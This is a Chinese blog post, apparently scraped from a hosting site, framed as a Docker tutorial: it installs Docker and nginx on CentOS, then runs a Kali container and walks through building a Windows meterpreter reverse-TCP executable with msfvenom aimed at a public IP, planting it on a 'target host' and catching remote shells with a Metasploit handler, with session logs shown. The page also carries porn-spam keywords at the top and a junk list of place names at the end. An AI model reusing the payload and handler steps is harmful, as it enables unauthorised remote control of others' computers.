亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

docker使用教程

發布時間:2020-04-02 14:55:30 來源:網絡 閱讀:1945 作者:時間帶 欄目:安全技術

1. 購買一個外網的服務器,這里我使用的是centos

2. 配置yum源

wget https://mirrors.ustc.edu.cn/docker-ce/linux/centos/docker-ce.repo -O /etc/yum.repos.d/docker-ce.repo
yum clean all; yum makecache fast       --重新刷新yum源

3. 安裝與啟動docker

yum -y install docker-ce
systemctl restart docker
systemctl enable docker     開機自啟

4. 搜索與安裝容器

4.1 以 nginx 為例
docker search nginx   搜索
docker pull nginx     安裝nginx
4.2 啟動 nginx
docker run --name web1 -d -p 80:80 nginx
--name :表示啟動的名字
-d: daemon,守護進程
-p:設置映射端口
驗證頁面,輸入網址即可訪問

docker使用教程

對頁面進行修改:

docker exec -it web1 /bin/bash    進入容器
root@3e93e119b79c:/# cat /usr/share/nginx/html/ 
50x.html    index.html
root@3e93e119b79c:/# echo "<h2>test nginx page<h2>" > /usr/share/nginx/html/index.html
使用exit退出,這時刷新之前的網頁,nginx的歡迎頁面就變成上面修改的內容了。

5. 安裝外網kali

先搜索

docker search kali

安裝

docker pull booyaabes/kali-linux-full

使用

[root@vultr ~]# docker image ls
REPOSITORY                  TAG                 IMAGE ID            CREATED         SIZE
booyaabes/kali-linux-full   latest              4bffca040c1c        6 hours ago         8.31GB
nginx                                 latest              bc26f1ed35cf        16 hours ago        109MB
[root@vultr ~]# docker run -it 4bffca040c1c
root@c5785446988a:/# cat /etc/os-release 
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2018.4"
VERSION_ID="2018.4"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"

直接使用即可。
如果需要監聽端口,實現連接反彈shell

docker run -p 4444:4455 -it booyaabes/kali-linux-full

使用docker映射容器4455端口到local上的4444端口

[root@vultr ~]# docker container ls
CONTAINER ID        IMAGE                       COMMAND                   CREATED             STATUS              PORTS                    NAMES
8612e672d5db        booyaabes/kali-linux-full   "/bin/sh -c \"/bin/ba…"   2 minutes ago       Up 2 minutes        0.0.0.0:4444->4455/tcp   hungry_goldberg

[root@vultr ~]# docker attach 8612e672d5db   進入kali容器之中

制作payload(使用本地的kali制作payload)

root@kal:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=149.248.8.210 LPORT=4444 -f exe > test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

將exe文件放到目標主機上
在kali容器中運行msf

[root@vultr ~]# docker attach 9b2fcb0c1d21
root@9b2fcb0c1d21:/# msfconsole 

         ,           ,
        /             \
     ((__---,,,---__))
            (_) O O (_)_________
                 \ _ /            |\
                    o_o \   M S F   | \
                             \   _____  |  *
                                |||   WW|||
                                |||     |||

             =[ metasploit v4.17.14-dev                         ]
+ -- --=[ 1809 exploits - 1030 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 149.248.8.210
lhost => 149.248.8.210
msf exploit(multi/handler) > set lport 4455
port => 4455
msf exploit(multi/handler) > run 
[-] Handler failed to bind to 149.248.8.210:4455:-  -
[*] Started reverse TCP handler on 0.0.0.0:4455 
[*] Sending stage (179779 bytes) to 42.90.91.248
[*] Meterpreter session 1 opened (172.17.0.3:4455 -> 42.90.91.248:11526) at 2018-09-26 09:39:23 +0000
[*] Sending stage (179779 bytes) to 42.90.91.248
[*] Meterpreter session 2 opened (172.17.0.3:4455 -> 42.90.91.248:11528) at 2018-09-26 09:39:25 +0000

meterpreter > 

這樣就拿到了反彈shell

docker借鑒學習:https://yeasy.gitbooks.io/docker_practice/image/

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

炎陵县| 祁东县| 林周县| 松溪县| 那坡县| 利川市| 额济纳旗| 怀柔区| 南丹县| 桓台县| 故城县| 佛冈县| 麻阳| 新干县| 师宗县| 拜泉县| 米易县| 桐梓县| 高陵县| 农安县| 望城县| 衡南县| 湖口县| 盐城市| 金坛市| 尚志市| 定兴县| 疏勒县| 巧家县| 泗洪县| 旬阳县| 凤庆县| 邵阳县| 怀化市| 普洱| 额尔古纳市| 建阳市| 蒲城县| 资阳市| 鄂伦春自治旗| 长宁区|